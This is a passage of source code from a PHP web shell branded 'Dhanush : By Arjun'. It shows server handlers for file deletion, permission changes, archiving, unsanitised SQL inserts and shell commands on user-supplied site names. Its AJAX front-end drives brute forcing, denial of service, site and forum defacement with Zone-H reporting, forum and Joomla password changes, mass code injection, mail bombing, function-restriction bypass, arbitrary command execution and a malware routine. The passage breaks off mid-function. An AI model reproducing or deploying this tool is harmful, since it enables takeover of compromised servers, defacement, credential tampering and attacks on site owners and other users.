4614 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4615 $num = mysql_num_rows( $pResult );
4616
4617 $rowcount = $num;
4618
4619 $pResultLen = mysql_list_fields( $dbname, $tablename );
4620
4621 for( $i = 0; $i < $num; $i++ )
4622 {
4623 $field = mysql_fetch_array( $pResult );
4624 $fieldname = $field["Field"];
4625 $arrdata = $_REQUEST[$fieldname];
4626
4627 $str1 .= "".$fieldname . ",";
4628 $str2 .= "'".$arrdata . "',";
4629 $rowcount--;
4630 if($rowcount != 0)
4631 {
4632 //$str1 .= $fieldname . ",";
4633 //$str2 .= $arrdata . ",";
4634 }
4635 }
4636 $str1=eregi_replace(',$', '', $str1);
4637 $str2=eregi_replace(',$', '', $str2);
4638 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
4639 mysql_query($str);
4640
4641 ?><div id="showsql"></div><?php
4642}
4643else if(isset($_GET['logoutdb']))
4644{
4645 setcookie("dbserver",time() - 60*60);
4646 setcookie("dbuser",time() - 60*60);
4647 setcookie("dbpass",time() - 60*60);
4648 header("Location:$self");
4649}
4650else if(isset($_POST['choice']))
4651{
4652 if($_POST['choice'] == "delete")
4653 {
4654 $actbox = $_POST["actbox"];
4655
4656 foreach ($actbox as $myv)
4657 $myv = explode(",",$myv);
4658 foreach ($myv as $v)
4659 {
4660 if(is_file($v))
4661 {
4662 if(unlink($v))
4663 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
4664 else
4665 echo "<br><center>Cannot Delete File $v</center>";
4666 }
4667 else if(is_dir($v))
4668 {
4669 rrmdir($v);
4670 }
4671 }
4672 }
4673 else if($_POST['choice'] == "chmod")
4674 { ?>
4675 <form id="chform"><?php
4676 $actbox1 = $_POST['actbox'];
4677 foreach ($actbox1 as $myv)
4678 $myv = explode(",",$myv);
4679 foreach ($myv as $v)
4680 { ?>
4681 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
4682 <?php }
4683 ?>
4684 <table align="center" border="3" style="width:40%; border-color:#333333;">
4685 <tr>
4686 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4687 </tr>
4688 <tr>
4689 <td colspan="2" align="center" style="height:60px">
4690 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
4691 </tr>
4692 </table>
4693
4694 </form> <?php
4695 }
4696 else if($_POST['choice'] == "changefileperms")
4697 {
4698 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
4699 {
4700 $actbox = $_POST["actbox"];
4701 foreach ($actbox as $myv)
4702 $myv = explode(",",$myv);
4703 foreach ($myv as $v)
4704 {
4705 if(is_file($v) || is_dir($v))
4706 {
4707 $perms = 0;
4708 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
4709 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
4710 echo "<div align=left style=width:60%;>";
4711 if(@chmod($v,$perms))
4712 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
4713 else
4714 echo "Cannot Change $v File Permissions<br>";
4715 echo "</div>";
4716 }
4717 }
4718
4719 }
4720 }
4721 else if($_POST['choice'] == "compre")
4722 {
4723 $actbox = $_POST["actbox"];
4724 foreach ($actbox as $myv)
4725 $myv = explode(",",$myv);
4726 foreach ($myv as $v)
4727 {
4728 if(is_file($v))
4729 {
4730 $zip = new ZipArchive();
4731 $filename= basename($v) . '.zip';
4732 if(($zip->open($filename, ZipArchive::CREATE))!==true)
4733 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
4734 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
4735 $zip->addFile(basename($v));
4736 $zip->close();
4737 }
4738 else if(is_dir($v))
4739 {
4740 if($os == "Linux")
4741 {
4742 $filename= basename($v);
4743 execmd("tar --create --recursion --file=$filename.tar $v");
4744 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
4745 }
4746 }
4747 }
4748 }
4749 else if($_POST['choice'] == "uncompre")
4750 {
4751 $actbox = $_POST["actbox"];
4752 foreach ($actbox as $myv)
4753 $myv = explode(",",$myv);
4754 foreach ($myv as $v)
4755 {
4756 if(is_file($v) || is_dir($v))
4757 {
4758 $zip = new ZipArchive;
4759 $filename= basename($v);
4760 $res = $zip->open($filename);
4761 if ($res === TRUE)
4762 {
4763 $pieces = explode(".",$filename);
4764 $zip->extractTo($pieces[0]);
4765 $zip->close();
4766 echo "<br><font class=txt size=3>File $v Unzipped successfully</font>";
4767 } else
4768 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
4769 }
4770 }
4771 }
4772}
4773else if(isset($_GET['sitename']))
4774{
4775 $sitename = str_replace("http://","",$_GET['sitename']);
4776 $sitename = str_replace("http://www.","",$sitename);
4777 $sitename = str_replace("www.","",$sitename);
4778 $show = myexe("ls -la /etc/valiases/".$sitename);
4779 if(!empty($show))
4780 echo $show;
4781 else
4782 echo "Cannot get the username";
4783}
4784else if(isset($_GET['mydata']))
4785{
4786 listdatabase();
4787}
4788else if(isset($_GET['home']))
4789{
4790 mainfun($_GET['home']);
4791}
4792else if(isset($_GET['dir']))
4793{
4794 mainfun($_GET['myfilepath']);
4795}
4796else if(isset($_GET['mydirpath']))
4797{
4798 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
4799}
4800else
4801{
4802?>
4803<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
4804<title>Dhanush : By Arjun</title>
4805<script type="text/javascript">
4806checked = false;
4807var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
4808function checkedAll ()
4809{
4810 if (checked == false){checked = true}else{checked = false}
4811 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
4812 {
4813 document.getElementById('myform').elements[i].checked = checked;
4814 }
4815}
4816function urlchange(myfilepath)
4817{
4818 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
4819 splitter = "<?php echo addslashes($directorysperator); ?>";
4820 mypath = mpath = myfilepath.split(splitter);
4821 <?php if($os == "Linux") { ?>
4822 r = "/";
4823 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
4824 <?php } ?>
4825 for (i = 0; i < mypath.length; i++)
4826 {
4827 if(mypath[i] == "")
4828 continue;
4829 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
4830
4831 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
4832 }
4833 myurl = myurl.replace(/\\/g,"\\\\");
4834 return myurl;
4835}
4836function wrtblDIR(mydirpath)
4837{
4838 var ajaxRequest;
4839 ajaxRequest = new XMLHttpRequest();
4840
4841 ajaxRequest.onreadystatechange = function()
4842 {
4843 if(ajaxRequest.readyState == 4)
4844 {
4845 for(i=0;i<=3;i++)
4846 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
4847 }
4848 }
4849
4850 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?&mydirpath="+mydirpath, true);
4851 ajaxRequest.send(null);
4852}
4853function setpath(myfilpath)
4854{
4855 wrtblDIR(myfilpath);
4856 document.getElementById("path").value=myfilpath;
4857 document.getElementById("createfile").value=myfilpath;
4858 document.getElementById("createfolder").value=myfilpath;
4859 document.getElementById("createfolder").value=myfilpath;
4860 document.getElementById("exepath").value=myfilpath;
4861 document.getElementById("auexepath").value=myfilpath;
4862 document.getElementById("showdir").innerHTML="";
4863}
4864function changedir(myaction,myfilepath)
4865{
4866 var myurl = urlchange(myfilepath);
4867
4868 document.getElementById("showmaindata").innerHTML=waitstate;
4869 var ajaxRequest;
4870 ajaxRequest = new XMLHttpRequest();
4871
4872 ajaxRequest.onreadystatechange = function()
4873 {
4874 if(ajaxRequest.readyState == 4)
4875 {
4876 setpath(myfilepath);
4877 document.getElementById("crdir").innerHTML=myurl;
4878 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4879 }
4880 }
4881
4882 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
4883 ajaxRequest.send(null);
4884}
4885function gethome(myaction,mydir)
4886{
4887 var myurl = urlchange(mydir);
4888 document.getElementById("showmaindata").innerHTML=waitstate;
4889 var ajaxRequest;
4890 ajaxRequest = new XMLHttpRequest();
4891
4892 ajaxRequest.onreadystatechange = function()
4893 {
4894 if(ajaxRequest.readyState == 4)
4895 {
4896 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4897 setpath(mydir);
4898 document.getElementById("crdir").innerHTML=myurl;
4899 }
4900 }
4901
4902 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
4903 ajaxRequest.send(null);
4904}
4905function getname(sitename)
4906{
4907 document.getElementById("showsite").innerHTML=waitstate;
4908 var ajaxRequest;
4909 ajaxRequest = new XMLHttpRequest();
4910
4911 ajaxRequest.onreadystatechange = function()
4912 {
4913 if(ajaxRequest.readyState == 4)
4914 {
4915 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
4916 }
4917 }
4918
4919 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
4920 ajaxRequest.send(null);
4921}
4922function myaction(myfileaction,chmode)
4923{
4924 var mytype = document.getElementsByName('actbox[]');
4925 var mychoice = new Array();
4926
4927 for (var i = 0, length = mytype.length; i < length; i++)
4928 {
4929 if (mytype[i].checked)
4930 mychoice[i] = mytype[i].value;
4931 }
4932
4933 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
4934
4935 document.getElementById("showdir").innerHTML=waitstate;
4936 var ajaxRequest;
4937 ajaxRequest = new XMLHttpRequest();
4938
4939 ajaxRequest.onreadystatechange = function()
4940 {
4941 if(ajaxRequest.readyState == 4)
4942 {
4943 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
4944 }
4945 }
4946
4947 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4948 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4949 ajaxRequest.send(params);
4950}
4951function editdata()
4952{
4953 var result = "", // initialize list
4954 i,dbname,tablename;
4955 // iterate through arguments
4956 for (i = 1; i < arguments.length; i++)
4957 {
4958 if(i%2 == 0)
4959 result += arguments[i]+'=';
4960 else
4961 result += arguments[i]+'&';
4962 }
4963 result = result.slice(0, -1);
4964
4965 dbname = arguments[3];
4966 tablename = arguments[5];
4967 var result=result.replace(/dhanush_/g,"");
4968 var params = arguments[0]+"="+result;
4969
4970 document.getElementById("showsql").innerHTML=waitstate;
4971 var ajaxRequest;
4972 ajaxRequest = new XMLHttpRequest();
4973
4974 ajaxRequest.onreadystatechange = function()
4975 {
4976 if(ajaxRequest.readyState == 4)
4977 {
4978 viewtables('listTables',dbname,tablename);
4979 }
4980 }
4981
4982 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4983 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4984 ajaxRequest.send(params);
4985}
4986function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
4987{
4988 document.getElementById("showsql").innerHTML=waitstate;
4989 var ajaxRequest;
4990 ajaxRequest = new XMLHttpRequest();
4991
4992 ajaxRequest.onreadystatechange = function()
4993 {
4994 if(ajaxRequest.readyState == 4)
4995 {
4996 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
4997 }
4998 }
4999
5000 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
5001 ajaxRequest.send(null);
5002}
5003function mydatabase(server,username,password)
5004{
5005 document.getElementById("showsql").innerHTML=waitstate;
5006 var ajaxRequest;
5007 ajaxRequest = new XMLHttpRequest();
5008
5009 ajaxRequest.onreadystatechange = function()
5010 {
5011 if(ajaxRequest.readyState == 4)
5012 {
5013 mydatago();
5014 }
5015 }
5016
5017 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
5018 ajaxRequest.send(null);
5019}
5020function mydatago()
5021{
5022 var ajaxRequest;
5023 ajaxRequest = new XMLHttpRequest();
5024
5025 ajaxRequest.onreadystatechange = function()
5026 {
5027 if(ajaxRequest.readyState == 4)
5028 {
5029 document.getElementById("datatable").style.display = 'none';
5030 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
5031 }
5032 }
5033
5034 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
5035 ajaxRequest.send(null);
5036}
5037function bruteforce(prototype,serverport,login,dict)
5038{
5039 var mytype = document.getElementsByName('mytype');
5040 for (var i = 0, length = mytype.length; i < length; i++)
5041 {
5042 if (mytype[i].checked)
5043 break;
5044 }
5045 var getreverse = 0;
5046 if(document.getElementById('reverse').checked == true)
5047 getreverse = 1;
5048 else
5049 getreverse = 0;
5050
5051 document.getElementById("showbrute").innerHTML=waitstate;
5052 var ajaxRequest;
5053 ajaxRequest = new XMLHttpRequest();
5054
5055 ajaxRequest.onreadystatechange = function()
5056 {
5057 if(ajaxRequest.readyState == 4)
5058 {
5059 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
5060 }
5061 }
5062
5063 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
5064 ajaxRequest.send(null);
5065}
5066function executemyfile(action,executepath,execute)
5067{
5068 document.getElementById("showmaindata").innerHTML=waitstate;
5069 var ajaxRequest;
5070 ajaxRequest = new XMLHttpRequest();
5071
5072 ajaxRequest.onreadystatechange = function()
5073 {
5074 if(ajaxRequest.readyState == 4)
5075 {
5076 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5077 }
5078 }
5079
5080 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
5081 ajaxRequest.send(null);
5082}
5083function maindata(myaction,dir)
5084{
5085 document.getElementById("showmaindata").innerHTML=waitstate;
5086 var ajaxRequest;
5087 ajaxRequest = new XMLHttpRequest();
5088
5089 ajaxRequest.onreadystatechange = function()
5090 {
5091 if(ajaxRequest.readyState == 4)
5092 {
5093 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5094 document.getElementById("showdir").innerHTML="";
5095 }
5096 }
5097
5098 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
5099 ajaxRequest.send(null);
5100}
5101function manuallyscriptfn(passwd)
5102{
5103 var message = encodeURIComponent(passwd);
5104 var params = "scriptlocator=scriptlocator&passwd="+passwd;
5105 document.getElementById("showdata").innerHTML=waitstate;
5106 var ajaxRequest;
5107 ajaxRequest = new XMLHttpRequest();
5108
5109 ajaxRequest.onreadystatechange = function()
5110 {
5111 if(ajaxRequest.readyState == 4)
5112 {
5113 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5114 }
5115 }
5116
5117 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5118 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5119 ajaxRequest.send(params);
5120}
5121function my404page(message)
5122{
5123 var message = encodeURIComponent(message);
5124 var params = "404page=404page&message="+message;
5125 document.getElementById("showdata").innerHTML=waitstate;
5126 var ajaxRequest;
5127 ajaxRequest = new XMLHttpRequest();
5128
5129 ajaxRequest.onreadystatechange = function()
5130 {
5131 if(ajaxRequest.readyState == 4)
5132 {
5133 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5134 }
5135 }
5136
5137 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5138 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5139 ajaxRequest.send(params);
5140}
5141function executemyfn(executepath,executemycmd)
5142{
5143 document.getElementById("showexecute").innerHTML="Wait....";
5144 var ajaxRequest;
5145 ajaxRequest = new XMLHttpRequest();
5146
5147 ajaxRequest.onreadystatechange = function()
5148 {
5149 if(ajaxRequest.readyState == 4)
5150 {
5151 document.getElementById("showexecute").innerHTML=ajaxRequest.responseText;
5152 }
5153 }
5154
5155 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
5156 ajaxRequest.send(null);
5157}
5158function zoneh(defacer,hackmode,reason,domain)
5159{
5160 var domain = encodeURIComponent(domain);
5161 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
5162 document.getElementById("showzone").innerHTML=waitstate;
5163 var ajaxRequest;
5164 ajaxRequest = new XMLHttpRequest();
5165
5166 ajaxRequest.onreadystatechange = function()
5167 {
5168 if(ajaxRequest.readyState == 4)
5169 {
5170 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
5171 }
5172 }
5173
5174 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5175 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5176 ajaxRequest.send(params);
5177}
5178function savemyfile(file,content)
5179{
5180 var content = encodeURIComponent(content);
5181 var params = "content="+content+"&file="+file;
5182 document.getElementById("showmydata").innerHTML=waitstate;
5183 var ajaxRequest;
5184 ajaxRequest = new XMLHttpRequest();
5185
5186 ajaxRequest.onreadystatechange = function()
5187 {
5188 if(ajaxRequest.readyState == 4)
5189 {
5190 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5191 }
5192 }
5193
5194 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5195 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5196 ajaxRequest.send(params);
5197}
5198function renamefun(file,to)
5199{
5200 document.getElementById("showmydata").innerHTML=waitstate;
5201 var ajaxRequest;
5202 ajaxRequest = new XMLHttpRequest();
5203
5204 ajaxRequest.onreadystatechange = function()
5205 {
5206 if(ajaxRequest.readyState == 4)
5207 {
5208 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5209 }
5210 }
5211
5212 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
5213 ajaxRequest.send(null);
5214}
5215function changeperms(chmode,myfilename)
5216{
5217 document.getElementById("showmydata").innerHTML=waitstate;
5218 var ajaxRequest;
5219 ajaxRequest = new XMLHttpRequest();
5220
5221 ajaxRequest.onreadystatechange = function()
5222 {
5223 if(ajaxRequest.readyState == 4)
5224 {
5225 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5226 }
5227 }
5228
5229 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
5230 ajaxRequest.send(null);
5231}
5232function defacefun(deface)
5233{
5234 var ajaxRequest;
5235 ajaxRequest = new XMLHttpRequest();
5236
5237 ajaxRequest.onreadystatechange = function()
5238 {
5239 if(ajaxRequest.readyState == 4)
5240 {
5241 alert(ajaxRequest.responseText);
5242 }
5243 }
5244
5245 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
5246 ajaxRequest.send(null);
5247}
5248function fileaction(myaction,myfilepath)
5249{
5250 document.getElementById("showmydata").innerHTML=waitstate;
5251 var ajaxRequest;
5252 ajaxRequest = new XMLHttpRequest();
5253
5254 ajaxRequest.onreadystatechange = function()
5255 {
5256 if(ajaxRequest.readyState == 4)
5257 {
5258 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5259 }
5260 }
5261
5262 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
5263 ajaxRequest.send(null);
5264}
5265function bypassfun(funct,functvalue,optiontype)
5266{
5267 document.getElementById("showbyp").innerHTML=waitstate;
5268 var ajaxRequest;
5269 ajaxRequest = new XMLHttpRequest();
5270
5271 ajaxRequest.onreadystatechange = function()
5272 {
5273 if(ajaxRequest.readyState == 4)
5274 {
5275 document.getElementById("showbyp").innerHTML=ajaxRequest.responseText;
5276 }
5277 }
5278
5279 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
5280 ajaxRequest.send(null);
5281}
5282function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
5283{
5284 document.getElementById("showdos").innerHTML=waitstate;
5285 var ajaxRequest;
5286 ajaxRequest = new XMLHttpRequest();
5287
5288 ajaxRequest.onreadystatechange = function()
5289 {
5290 if(ajaxRequest.readyState == 4)
5291 {
5292 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
5293 }
5294 }
5295
5296 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
5297 ajaxRequest.send(null);
5298}
5299function createfile(filecreator,filecontent)
5300{
5301 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
5302 var filecontent = encodeURIComponent(filecontent);
5303 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
5304 document.getElementById("showdir").innerHTML=waitstate;
5305 var ajaxRequest;
5306 ajaxRequest = new XMLHttpRequest();
5307
5308 ajaxRequest.onreadystatechange = function()
5309 {
5310 if(ajaxRequest.readyState == 4)
5311 {
5312 gethome('home',mm);
5313 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5314 }
5315 }
5316
5317 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5318 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5319 ajaxRequest.send(params);
5320}
5321function createdir(create,createfolder)
5322{
5323 document.getElementById("showdir").innerHTML=waitstate;
5324 var ajaxRequest;
5325 ajaxRequest = new XMLHttpRequest();
5326
5327 ajaxRequest.onreadystatechange = function()
5328 {
5329 if(ajaxRequest.readyState == 4)
5330 {
5331 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5332 }
5333 }
5334
5335 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
5336 ajaxRequest.send(null);
5337}
5338function codeinsert(code)
5339{
5340 var code = encodeURIComponent(code);
5341 var params = "getcode="+code;
5342 document.getElementById("showcode").innerHTML=waitstate;
5343 var ajaxRequest;
5344 ajaxRequest = new XMLHttpRequest();
5345
5346 ajaxRequest.onreadystatechange = function()
5347 {
5348 if(ajaxRequest.readyState == 4)
5349 {
5350 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
5351 }
5352 }
5353
5354 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5355 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5356 ajaxRequest.send(params);
5357}
5358function getmydata(mydata)
5359{
5360 document.getElementById("showmydata").innerHTML=waitstate;
5361 var ajaxRequest;
5362 ajaxRequest = new XMLHttpRequest();
5363
5364 ajaxRequest.onreadystatechange = function()
5365 {
5366 if(ajaxRequest.readyState == 4)
5367 {
5368 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5369 }
5370 }
5371
5372 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
5373 ajaxRequest.send(null);
5374}
5375function getdata(mydata,myfile)
5376{
5377 document.getElementById("showdata").innerHTML=waitstate;
5378 var ajaxRequest;
5379 ajaxRequest = new XMLHttpRequest();
5380
5381 ajaxRequest.onreadystatechange = function()
5382 {
5383 if(ajaxRequest.readyState == 4)
5384 {
5385 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5386 }
5387 }
5388
5389 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
5390 ajaxRequest.send(null);
5391}
5392function getport(host,protocol,start,end)
5393{
5394 document.getElementById("showports").innerHTML=waitstate;
5395 var ajaxRequest;
5396 ajaxRequest = new XMLHttpRequest();
5397
5398 ajaxRequest.onreadystatechange = function()
5399 {
5400 if(ajaxRequest.readyState == 4)
5401 {
5402 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
5403 }
5404 }
5405
5406 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
5407 ajaxRequest.send(null);
5408}
5409function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uid,uname,newpass)
5410{
5411 document.getElementById("showchangepass").innerHTML=waitstate;
5412 var ajaxRequest;
5413 ajaxRequest = new XMLHttpRequest();
5414
5415 ajaxRequest.onreadystatechange = function()
5416 {
5417 if(ajaxRequest.readyState == 4)
5418 {
5419 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
5420 }
5421 }
5422
5423 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uid=" + uid + "&uname=" + uname + "&newpass=" + newpass, true);
5424 ajaxRequest.send(null);
5425}
5426function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,alll,f5)
5427{
5428 var index = encodeURIComponent(index);
5429 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&alll="+alll+"&f5="+f5;
5430 document.getElementById("showdeface").innerHTML=waitstate;
5431 var ajaxRequest;
5432 ajaxRequest = new XMLHttpRequest();
5433
5434 ajaxRequest.onreadystatechange = function()
5435 {
5436 if(ajaxRequest.readyState == 4)
5437 {
5438 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
5439 }
5440 }
5441
5442 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5443 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5444 ajaxRequest.send(params);
5445}
5446function codeinjector(pathtomass,mode,filetype,injectthis)
5447{
5448 var injectthis = encodeURIComponent(injectthis);
5449 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
5450 document.getElementById("showinject").innerHTML=waitstate;
5451 var ajaxRequest;
5452 ajaxRequest = new XMLHttpRequest();
5453
5454 ajaxRequest.onreadystatechange = function()
5455 {
5456 if(ajaxRequest.readyState == 4)
5457 {
5458 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
5459 }
5460 }
5461
5462 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5463 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5464 ajaxRequest.send(params);
5465}
5466function sendmail(mailfunction,to,subject,message,from,times,padding)
5467{
5468 var message = encodeURIComponent(message);
5469 if(mailfunction == "massmailing")
5470 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
5471 else if(mailfunction == "dobombing")
5472 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
5473 document.getElementById("showmail").innerHTML=waitstate;
5474 var ajaxRequest;
5475 ajaxRequest = new XMLHttpRequest();
5476
5477 ajaxRequest.onreadystatechange = function()
5478 {
5479 if(ajaxRequest.readyState == 4)
5480 {
5481 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
5482 }
5483 }
5484
5485 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5486 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5487 ajaxRequest.send(params);
5488}
5489function execode(code)
5490{
5491 var intext = document.getElementById('intext').checked;
5492 var message = encodeURIComponent(message);
5493 var params = "code="+code+"&intext="+intext;
5494 document.getElementById("showresult").innerHTML=waitstate;
5495 var ajaxRequest;
5496 ajaxRequest = new XMLHttpRequest();
5497
5498 ajaxRequest.onreadystatechange = function()
5499 {
5500 if(ajaxRequest.readyState == 4)
5501 {
5502 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
5503 }
5504 }
5505
5506 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5507 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5508 ajaxRequest.send(params);
5509}
5510function malwarefun(malwork)
5511{
5512 var malpath = document.getElementById('createfile').value;
5513 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
5514 var ajaxRequest;
5515 ajaxRequest = new XMLHttpRequest();
5516
5517 ajaxRequest.onreadystatechange = function()
5518 {
